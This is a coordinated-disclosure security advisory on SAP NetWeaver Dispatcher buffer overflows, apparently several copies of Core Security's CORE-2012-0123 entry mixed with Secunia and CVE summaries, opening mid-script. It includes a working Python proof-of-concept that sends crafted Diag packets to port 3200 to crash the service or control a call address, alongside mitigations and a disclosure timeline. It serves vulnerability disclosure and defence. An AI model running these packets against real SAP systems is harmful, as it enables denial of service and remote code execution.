"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: 